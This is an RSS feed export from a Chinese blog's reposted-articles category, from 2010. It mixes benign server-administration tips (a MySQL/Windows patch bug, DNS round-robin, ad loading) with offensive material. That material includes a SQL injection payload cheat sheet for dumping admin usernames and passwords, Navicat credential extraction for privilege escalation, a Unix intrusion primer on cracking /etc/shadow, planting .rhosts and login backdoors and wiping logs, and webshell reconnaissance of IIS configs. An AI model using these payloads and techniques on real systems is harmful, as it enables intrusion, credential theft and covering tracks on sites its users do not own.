<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0">
<channel>
<title><![CDATA[许诺's Blog - 技术转载]]></title>
<link>http://www.swhack.cn/</link>
<description><![CDATA[蝉在地下的漫长等待，只为枝头一夏的绝响！]]></description>
<language>zh-cn</language>
<copyright><![CDATA[Copyright 2005 PBlog3 v2.8]]></copyright>
<webMaster><![CDATA[251812239@qq.com(许诺)]]></webMaster>
<generator>PBlog2 v2.4</generator> 
<image>
	<title>许诺&#39;s Blog</title>
	<url>http://www.swhack.cn/images/logos.gif</url>
	<link>http://www.swhack.cn/</link>
	<description>许诺&#39;s Blog</description>
</image>

			<item>
			<link>http://www.swhack.cn/article.asp?id=280</link>
			<title><![CDATA[利用navicat提权]]></title>
			<author>251812239@qq.com(许诺)</author>
			<category><![CDATA[技术转载]]></category>
			<pubDate>Wed,28 Jul 2010 23:26:56 +0800</pubDate>
			<guid>http://www.swhack.cn/default.asp?id=280</guid>
		<description><![CDATA[navicat是一个比较流行的MySQL管理工具，在很多服务器上都可以找到&nbsp;&nbsp;<br/>有两个方法提权： .<br/>1、从日志文件里找密码，navicat会把操作日志（比如加账户）保存到My Documents\Navicat\MySQL\logs下的LogHistory.txt，低版本是安装目录下的logs下LogHistory.txt&nbsp;&nbsp;<br/>2、navicat管理的MySQL服务器信息（一般是root帐户）是存在注册表里的，具体是HKEY_CURRENT_USER\Software\PremiumSoft\Navicat\Servers下，导出注册表导入到本机然后星号察看就OK了。。 <br/><br/>作者不祥，所以未有版<br/><br/><br/>]]></description>
		</item>
		
			<item>
			<link>http://www.swhack.cn/article.asp?id=277</link>
			<title><![CDATA[win2003偶尔出现Can not connect to MySQL server]]></title>
			<author>251812239@qq.com(许诺)</author>
			<category><![CDATA[技术转载]]></category>
			<pubDate>Wed,21 Jul 2010 17:23:44 +0800</pubDate>
			<guid>http://www.swhack.cn/default.asp?id=277</guid>
		<description><![CDATA[这几天有MySQL数据库服务器频繁出现掉线，经排查，并没有受攻击，网上搜索了一下，很多人都碰到这问题，全是Windows系统上安装MySQL，原因是前段时间微软发布的补丁KB967723而导致的。现在有两种解决方法：<br/><br/>第一种：卸载KB967723补丁<br/>登录服务器，进入控制面板 — 添加和删除程序 — （勾选上方的“显示更新”）在里面可以看到更新的KB967723这个补丁，然后就想卸载普通软件一样卸载，卸载中会提示你，如果卸载可能导致程序运行出错，没关系，选择“是”，继续卸载。卸载完成后重启数据库服务器。<br/><br/>第二种：修改注册表<br/>本方法是微软给出的修改注册表修复该Bug的的方法，原因是默认最大的临时 TCP 端口的数是 5000 适用于一节中包含的产品中。 在这些产品中添加一个新参数。 要提高临时端口的上限，请按照下列步骤操作：<br/><br/>开始 → 运行 → 输入regedit → 启动注册表编辑器。 <br/>在注册表中找到以下子项，然后单击 参数 ： <br/>HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters<br/>在 编辑 菜单上单击 新建，然后添加下面的注册表项： <br/>数值名称： MaxUserPort <br/>值类型: DWORD<br/>值数据： 65534<br/>有效范围： 5000-65534 (十进制)<br/>默认值： 0x1388 (5000 十进制)<br/>说明： 此参数将控制程序从系统请求任何可用的用户端口时使用的最大端口数。 通常，1024 的值和包含的 5000 之间分配临时的 （短) 端口。<br/>退出注册表编辑器，并重新启动计算机。 <br/>微软原文链接：<a href="http://support.microsoft.com/kb/q196271" target="_blank" rel="external">http://support.microsoft.com/kb/q196271</a><br/><br/> <br/><br/>现此问题的原因是因为微软2009年发布了TCP/IP更新补丁（KB967723），如果服务器开启自动更新或者有自动更新软件下载更新了这个补丁，那么就会出现这个问题。出现Can not connect to MySQL server错误<br/><br/>]]></description>
		</item>
		
			<item>
			<link>http://www.swhack.cn/article.asp?id=276</link>
			<title><![CDATA[Web服务器负载均衡的几种方案 : DNS轮询]]></title>
			<author>251812239@qq.com(许诺)</author>
			<category><![CDATA[技术转载]]></category>
			<pubDate>Sun,18 Jul 2010 23:39:46 +0800</pubDate>
			<guid>http://www.swhack.cn/default.asp?id=276</guid>
		<description><![CDATA[DNS轮询 <br/><br/>大多域名注册商都支持多条A记录 的解析，其实这就是DNS轮询 ，DNS 服务器 将解析请求按照A记录 的顺序，逐一分配到不同的IP上，这样就完成了简单的负载均衡 。 <br/><br/><br/>优点<br/><br/>基本上无成本，因为往往域名注册商的这种解析都是免费的；&nbsp;&nbsp;<br/>部署方便，除了网络拓扑的简单扩增，新增的Web服务器只要增加一个公网IP即可。 <br/>&nbsp;&nbsp;<br/>缺点<br/><br/>健康检查，如果某台服务器宕机，DNS服务器是无法知晓的，仍旧会将访问分配到此服务器。修改DNS记录全部生效起码要3-4小时，甚至更久；&nbsp;&nbsp;<br/>分配不均，如果几台Web服务器之间的配置不同，能够承受的压力也就不同，但是DNS解析分配的访问却是均匀分配的。其实DNS也是有分配算法的，可以根据当前连接较少的分配、可以设置Rate权重分配等等，只是目前绝大多数的DNS服务器都不支持；&nbsp;&nbsp;<br/>会话保持，如果是需要身份验证的网站，在不修改软件构架的情况下，这点是比较致命的，因为DNS解析无法将验证用户的访问持久分配到同一服务器。虽然有一定的本地DNS缓存，但是很难保证在用户访问期间，本地DNS不过期，而重新查询服务器并指向新的服务器，那么原服务器保存的用户信息是无法被带到新服务器的，而且可能要求被重新认证身份，来回切换时间长了各台服务器都保存有用户不同的信息，对服务器资源也是一种浪费。 <br/>&nbsp;&nbsp;<br/>部署方法&nbsp;&nbsp; <br/><br/>这个是万网的域名控制面板，将同一域名解析到2条A记录 上。<br/><img src="http://www.swhack.cn/download.asp?id=222" border="0" alt=""/><br/><br/>这个是免费的智能DNS 解析服务，www.dns pod.com，不仅可以多条A记录 ，而且还能使用中国特色，根据电信、网通、教育网的用户访问，解析到不同的IP上。 <br/><img src="http://www.swhack.cn/download.asp?id=223" border="0" alt=""/><br/><br/>实验&nbsp;&nbsp; <br/><br/>先将www.fuckegg.com的A记录 解析到x.x.x.x和x.x.x.n上，然后使用nslookup工具查看。<br/>直接用cmd命令nslookup看到 解析到了两个IP了<br/><br/>关于DNS 服务器 的压力问题，其实并不用太过担心，因为解析记录通常都是有一小时的缓存的，如果用户最近一级的DNS 服务器 上的解析记录还未过期的话，是不用查询主服务器 的，通常DNS 都有一小时的缓存，所以这样就等于把压力分摊到了各用户最近一级的DNS 服务器 上了。<br/>]]></description>
		</item>
		
			<item>
			<link>http://www.swhack.cn/article.asp?id=270</link>
			<title><![CDATA[广告联盟的广告加载太慢，影响网页速度解决办法]]></title>
			<author>251812239@qq.com(许诺)</author>
			<category><![CDATA[技术转载]]></category>
			<pubDate>Mon,14 Jun 2010 12:26:26 +0800</pubDate>
			<guid>http://www.swhack.cn/default.asp?id=270</guid>
		<description><![CDATA[第一步：把这个放在广告位置<br/><br/>&lt;span id=ad_01&gt;广告载入中...&lt;/span&gt;<br/><br/>第二步：把这段代码放到页底:<br/><br/><br/>&lt;!----ADstart-----&gt;<br/>&lt;SPAN class=spanclass id=span_ad_01&gt;<br/>&lt;!----调用代码-----&gt;<br/><a href="http://www.fuckegg.com" target="_blank" rel="external">http://www.fuckegg.com</a> (这里是广告代码)<br/>&lt;!----调用代码-----&gt;<br/>&lt;/SPAN&gt;<br/>&lt;SCRIPT&gt;<br/>var aa=document.getElementById(&#34;ad_01&#34;);<br/>var bb=document.getElementById(&#34;span_ad_01&#34;);<br/>aa.innerHTML=bb.innerHTML;bb.innerHTML=&#34;&#34;;&lt;/SCRIPT&gt;<br/>&lt;!----ADend-----&gt;<br/><br/>]]></description>
		</item>
		
			<item>
			<link>http://www.swhack.cn/article.asp?id=258</link>
			<title><![CDATA[入侵Unix操作系统基础知识]]></title>
			<author>251812239@qq.com(许诺)</author>
			<category><![CDATA[技术转载]]></category>
			<pubDate>Thu,06 May 2010 07:50:16 +0800</pubDate>
			<guid>http://www.swhack.cn/default.asp?id=258</guid>
		<description><![CDATA[如果我们要入侵Unix操作系统，首先我们要对Unix操作系统很了解，对入侵的一些基础知识也要懂得如何运用。下面，我们就来给大家讲解一下入侵Unix操作系所需要知道的一些基础知识。Unix操作系统的一些基础知识：<br/>1.Unix操作系统具有如下特点：<br/>Unix操作系统分级树形文件结构、文件、目录表和外部设备作为文件统一管理、提供功能完备的命令程序语言&#34;Shell语言&#34;、提供了各种程序设计语言和大量的程序设计子系统、系统核心和外部程序大部分采用Ｃ语言编写、采用进程映像对换技术、系统效率高。<br/>2.主流Unix操作系统及制造商：<br/>386BSD----------------Internet免费 <br/>AIX------------------IBM <br/>A/UX------------------Apple <br/>BSD-------------------Univ.of Califonia ar Berkeley <br/>FreeBSD-----------------Internet 免费 <br/>HP-UX------------------HP <br/>UNIXWare----------------Novell <br/>SunOS------------------Sun Microsystems <br/>UNIX System V--------------AT&amp;T <br/>Solaris------------------Sun Microsystems<br/>3.基础Unix操作系统指令：<br/>下边是Unix操作系统指令和MS-DOS指令的一个对比，相信我不用多说，使用过DOS的 <br/>朋友，都能够进行一些基本的操作了！ <br/>[pre]<br/>CD = cd&nbsp;&nbsp; <br/>CD.. = cd..&nbsp;&nbsp; DIR/W = ls&nbsp;&nbsp; <br/>DIR = ls -l&nbsp;&nbsp; DIR/AH = ls -al AH=(hidden) -al=(include hidden files as well&nbsp;&nbsp; <br/>as regular)&nbsp;&nbsp; RENAME = mv&nbsp;&nbsp; <br/>ATTRIB = chmod&nbsp;&nbsp; MD = mkdir&nbsp;&nbsp; <br/>RD = rmdir&nbsp;&nbsp; DEL = rm&nbsp;&nbsp; <br/>COPY = cp <br/>[/pre]4.一些对入侵Unix操作系统可能有帮助的指令及文件：<br/>命令：uname -a <br/>用途：显示系统版本 <br/>对入侵者的用途：了解系统版本情况，对症小药。<br/>命令：ps <br/>用途：查看系统进程 <br/>对入侵者的用途：比如查看到ROOT启动了HTTPD，而WEB目录又任意用户可写的话，那本地用户可以写一个CGI，以ROOT的身份来调用系统命令，发达啦！<br/>命令：w <br/>用途：查看当前系统中的用户及其正在操作的命令对入侵者的用途：看看是不是有其它人在系统上呀，如果有就最好别下手了<br/>命令：su <br/>用途：改变当前用户在系统中的身份 <br/>对入侵者的用途：su root，不用说了吧！<br/>命令：ln <br/>用途：建立文件连接 <br/>对入侵者的用途：我前天发现了SunOS的一个文件链接漏洞，可以通过ln命令来改变文件的属主，属性，内容：）<br/>命令：rlogin <br/>用法：rlogin -l username hostname <br/>用途：远程登陆其它主机 <br/>对入侵者的用途：我们可以用它在登陆到其它的主机上，就是所谓的跳板吧！<br/>命令：gcc <br/>用法：gcc rootshell.c -o rootshell <br/>用途：编译Ｃ程序 <br/>对入侵者的用途：不用我说了吧！<br/>文件：$HOME/.histroy <br/>用途：历史记录文件 <br/>对入侵者的用途：用来记录你的命令，当然也可能是别人的命令，有两个作用如果这个系统已经被别人入侵了，而且是使用你这个用户名进行的，呵呵，看看history说不定能帮你找到他留下的后门，第二点是你成功获得ROOT后，一定要清除这个文件哦。<br/>文件：.bashrc <br/>用途：Bash Shell的个性化配置文件 <br/>对入侵者的用途：这个文件在启动Bash Shell的时候运行，它可以包含任何合法的命令及复杂的脚本指令，你想想在root的目录中放个这会有什么好处？（每一种Shell都有这样的文件哦）<br/>文件：/etc/passwd <br/>用途：用户密码文件 <br/>对入侵者的用途：看看系统有那些用户也好呀，或者当下来配合下边要提到的shadow进行密码破解也是一种办法哦。<br/>文件：/etc/shadow <br/>用途：用户密码文件 <br/>对入侵这的用途：其实用户真正的密码是在这里，如果可以的话把它和 <br/>/etc/passwd一起下载到本地，然后john跑用户密码<br/>文件：/etc/inetd.conf <br/>用途：系统配置文件 <br/>对入侵者的用途：more /etc/indtd.conf看看系统到底开放了那些服务。当然我们也可以利用它做后门，这以后再谈。<br/>文件：.rhosts <br/>用途：rlogin和rsh通过它做简单的认证 <br/>对入侵者的用途：&#34;+ +&#34;的后门你一定听说过吧？<br/>文件：login.c <br/>用途：用户登陆程序的源代码 <br/>对入侵者的用途：修改源代码，放个后门在里边。<br/>文件：wtmp，utmp，message,lastlog <br/>用途：日志文件 <br/>对入侵者的用途：清除你在系统中留下的影子<br/>入侵Unix操作系统之前，我们要有足够的准备，因为Unix操作系统的安全性很强，所以学习好基础知识很重要。 <br/>]]></description>
		</item>
		
			<item>
			<link>http://www.swhack.cn/article.asp?id=238</link>
			<title><![CDATA[注入语句]]></title>
			<author>251812239@qq.com(许诺)</author>
			<category><![CDATA[技术转载]]></category>
			<pubDate>Tue,23 Feb 2010 22:31:28 +0800</pubDate>
			<guid>http://www.swhack.cn/default.asp?id=238</guid>
		<description><![CDATA[转自<a href="http://bbs.77169.com" target="_blank">华夏</a>。残鑫总结<br/><br/><br/>注意：对于普通的get注入，如果是字符型，前加&#39;&nbsp;&nbsp; 后加 and &#39;&#39;=&#39;<br/><br/>拆半法<br/><br/>######################################<br/>and exists (sel&#101;ct * from MSysAccessObjects) 这个是判断是不是ACC数据库，MSysAccessObjects是ACCESS的默认表。<br/><br/>and exists (sel&#101;ct * from admin)<br/>and exists(sel&#101;ct id from admin)<br/>and exists(sel&#101;ct id from admin wh&#101;re id=1)<br/>and exists(sel&#101;ct id from admin wh&#101;re id&gt;1) <br/>然后再测试下id&gt;1 正常则说明不止一个ID 然后再id&lt;50 确定范围 <br/>and exists (sel&#101;ct username from admin)<br/>and exists (sel&#101;ct password from admin)<br/>and exists (sel&#101;ct id from admin wh&#101;re len(username)&lt;10 and id=1)<br/>and exists (sel&#101;ct id from admin wh&#101;re len(username)&gt;5 and id=1)<br/>and exists (sel&#101;ct id from admin wh&#101;re len(username)=6 and id=1)<br/>and exists (sel&#101;ct id from admin wh&#101;re len(password)&lt;10 and id=1)<br/>and exists (sel&#101;ct id from admin wh&#101;re len(password)&gt;5 and id=1)<br/>and exists (sel&#101;ct id from admin wh&#101;re len(password)=7 and id=1)<br/>and (sel&#101;ct top 1 asc(mid(username,1,1)) from admin)=97<br/>返回了正常，说明第一username里的第一位内容是ASC码的97，也就是a。<br/>猜第二位把username,1,1改成username,2,1就可以了。<br/>猜密码把username改成password就OK了<br/>##################################################<br/><br/>搜索型注入<br/>##################################<br/><br/>%&#39; and 1=1 and &#39;%&#39;=&#39;<br/>%&#39; and exists (sel&#101;ct * from admin) and &#39;%&#39;=&#39;<br/>%&#39; and exists(sel&#101;ct id from admin wh&#101;re id=1) and &#39;%&#39;=&#39;<br/>%&#39; and exists (sel&#101;ct id from admin wh&#101;re len(username)&lt;10 and id=1) and &#39;%&#39;=&#39;<br/>%&#39; and exists (sel&#101;ct id from admin wh&#101;re len(password)=7 and id=1) and &#39;%&#39;=&#39;<br/>%&#39; and (sel&#101;ct top 1 asc(mid(username,1,1)) from admin)=97 and &#39;%&#39;=&#39;<br/><br/>这里也说明一下，搜索型注入也无他，前加%&#39; 后加 and &#39;%&#39;=&#39;<br/>对于MSSQL数据库，后面可以吧 and &#39;%&#39;=&#39;换成--<br/>还有一点搜索型注入也可以使用union语句。<br/>########################################################<br/><br/>联合查询。<br/>#####################################<br/><br/>o&#114;der by 10<br/>and 1=2 union sel&#101;ct 1,2,3,4,5,6,7,8,9,10<br/>and 1=2 union sel&#101;ct 1,username,password,4,5,6,7,8,9,10 form admin<br/>and 1=2 union sel&#101;ct 1,username,password,4,5,6,7,8,9,10 form admin wh&#101;re id=1<br/><br/>很简单。有一点要说明一下，wh&#101;re id=1 这个是爆ID=1的管理员的时候，wh&#101;re id=1就是爆ID=2的管理用的，一般不加wh&#101;re id=1这个限制语句，应该是爆的最前面的管理员吧！（注意，管理的id是多少可不一定哈,说不定是100呢！）<br/><br/>###################################<br/><br/>cookie注入<br/><br/>###############################<br/><br/><a href="http://www." target="_blank" rel="external"><a href="http://www." target="_blank" rel="external">http://www.</a></a>******.com/shownews.asp?id=127<br/><a href="http://www." target="_blank" rel="external"><a href="http://www." target="_blank" rel="external">http://www.</a></a>******.com/shownews.asp<br/>alert(=&#34;id=&#34;+escape(&#34;127&#34;));<br/>alert(=&#34;id=&#34;+escape(&#34;127 and 1=1&#34;));<br/>alert(=&#34;id=&#34;+escape(&#34;127 o&#114;der by 10&#34;));<br/>alert(=&#34;id=&#34;+escape(&#34;127 and 1=2 union sel&#101;ct 1,username,password,4,5,6,7,8,9,10 from admin&#34;));<br/>alert(=&#34;id=&#34;+escape(&#34;127 and 1=2 union sel&#101;ct 1,username,password,4,5,6,7,8,9,10 from admin wh&#101;re id=1&#34;));<br/><br/>这些东西应该都不用解释了吧，给出语句就行了吧。这里还是用个联合查询，你把它换成拆半也一样，不过不太适合正常人使用，因为曾经有人这样累死过。<br/>###################################<br/><br/><br/>偏移注入<br/><br/>###########################################################<br/><br/>union sel&#101;ct 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from admin<br/>union sel&#101;ct 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,* from admin<br/><br/>union sel&#101;ct 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,* from (admin as a inner join admin as b on a.id=b.id)<br/><br/>union sel&#101;ct 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,a.id,* from (admin as a inner join admin as b on a.id=b.id)<br/><br/>union sel&#101;ct 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,a.id,b.id,* from (admin as a inner join admin as b on a.id=b.id)<br/><br/>union sel&#101;ct 1,2,3,4,5,6,7,8,9,10,11,12,13,a.id,b.id,c.id,* from ((admin as a inner join admin as b on a.id=b.id) inner join admin as c on a.id=c.id)<br/><br/>union sel&#101;ct 1,2,3,4,5,6,7,8,a.id,b.id,c.id,d.id,* from (((admin as a inner join admin as b on a.id=b.id) inner join admin as c on a.id=c.id) inner join admin as d on <br/><br/>a.id=d.id)<br/><br/>and 1=2 union sel&#101;ct 1,* from (admin as a inner join admin as b on a.id=b.id)<br/><br/>and 1=2 union sel&#101;ct 1,a.id,b.id,* from (admin as a inner join admin as b on a.id=b.id)<br/>]]></description>
		</item>
		
			<item>
			<link>http://www.swhack.cn/article.asp?id=237</link>
			<title><![CDATA[cain出现应用程序错误]]></title>
			<author>251812239@qq.com(许诺)</author>
			<category><![CDATA[技术转载]]></category>
			<pubDate>Tue,23 Feb 2010 12:26:38 +0800</pubDate>
			<guid>http://www.swhack.cn/default.asp?id=237</guid>
		<description><![CDATA[&nbsp;&nbsp;&nbsp;&nbsp;cain安装成功，但是无法启动的情况　提示　应用程序初始化(0xc00000222)失败，请单击确定，终止此应用程序，这并不是因为中毒了，或者杀软什么的，而是因为系统的c:\windows\system32\npstools.dll文件被替换了(可能有的系统为了安全故意替换的，包括netfuke没有这文件也是没法启动的)，只要用正确的npstools.dll替换到c:\windows\system32目录就可以了(如果c:\windows\system32\dllcache也有此文件，要先替换这个目录的)．如果有ntfs权限问题，要做出相应的设置(具体的可以参考视频教程。 <br/><br/>　　还有些情况，是winpcap安装不成功的，也是因为系统文件被替换了，或者做了相应的权限设置，主要有 <br/>　　Packet.dll，WanPacket.dll，wpcap.dll,pthreadVC.dll,npf.sys 。 <br/>]]></description>
		</item>
		
			<item>
			<link>http://www.swhack.cn/article.asp?id=233</link>
			<title><![CDATA[cmd下查看服务器iis域名信息]]></title>
			<author>251812239@qq.com(许诺)</author>
			<category><![CDATA[技术转载]]></category>
			<pubDate>Fri,29 Jan 2010 21:30:57 +0800</pubDate>
			<guid>http://www.swhack.cn/default.asp?id=233</guid>
		<description><![CDATA[Set ObjService=GetObject(&#34;IIS://LocalHost/W3SVC&#34;) <br/>For Each obj3w In objservice <br/>If IsNumeric(obj3w.Name) Then <br/>sServerName=Obj3w.ServerComment <br/>Set webSite = GetObject(&#34;IIS://Localhost/W3SVC/&#34; &amp; obj3w.Name &amp; &#34;/Root&#34;) <br/>ListAllWeb = ListAllWeb &amp; obj3w.Name &amp; String(25-Len(obj3w.Name),&#34; &#34;) &amp; obj3w.ServerComment &amp; &#34;(&#34; &amp; webSite.Path &amp; &#34;)&#34; &amp; vbCrLf<br/><br/>End If <br/>Next <br/>WScript.Echo ListAllWeb <br/>Set ObjService=Nothing <br/>WScript.Quit<br/><br/><br/>保存成*.vbs<br/><br/>执行cscript *.vbs<br/>]]></description>
		</item>
		
			<item>
			<link>http://www.swhack.cn/article.asp?id=223</link>
			<title><![CDATA[DZ 7.1 7.2 针对getshell的修复方法]]></title>
			<author>251812239@qq.com(许诺)</author>
			<category><![CDATA[技术转载]]></category>
			<pubDate>Wed,06 Jan 2010 17:18:13 +0800</pubDate>
			<guid>http://www.swhack.cn/default.asp?id=223</guid>
		<description><![CDATA[在common.inc.php上面加上<br/>$response=$scriptlang=array(); <br/><br/>这个洞t00ls团队发现的]]></description>
		</item>
		
			<item>
			<link>http://www.swhack.cn/article.asp?id=220</link>
			<title><![CDATA[webshell下查找IIS的站点配置信息]]></title>
			<author>251812239@qq.com(许诺)</author>
			<category><![CDATA[技术转载]]></category>
			<pubDate>Sun,03 Jan 2010 10:58:41 +0800</pubDate>
			<guid>http://www.swhack.cn/default.asp?id=220</guid>
		<description><![CDATA[默认IIS站点配置文件有2个MBSchema.xm和MetaBase.xml,路径是C:\WINDOWS\system32\inetsrv\(一般这个目录设置的everyone读的权限.)<br/><br/>MetaBase.xml这个文件是存的站点IIS配置的信息.里面可以查到所有本服务器IIS下设置的站点目录和配置。<br/><br/>几个主要的配置有:<br/><br/>ServerComment:我的网站 //站点的名称<br/>ServerBindings:80 //站点的端口<br/>Path=&#34;D:\wwwroot&#34; //这里是站点的路径<br/>DefaultDoc=&#34;index.asp,index.php,index.htm,Default.htm,Default.asp,Default.aspx&#34; //默认文档头,就是主页显示文件名<br/>ScriptMaps==&#34;.asa,C:\WINDOWS\syst...........&#34; //站点支持的哪些脚本.<br/><br/>还有就是看C:\WINDOWS\system32\inetsrv\History这个目录,这个目录里是对每次站点的IIS设置进行的备份.<br/><br/>但这些都涉及到权限问题，如果权限默认设置严格就访问不了了。 ]]></description>
		</item>
		
</channel>
</rss>
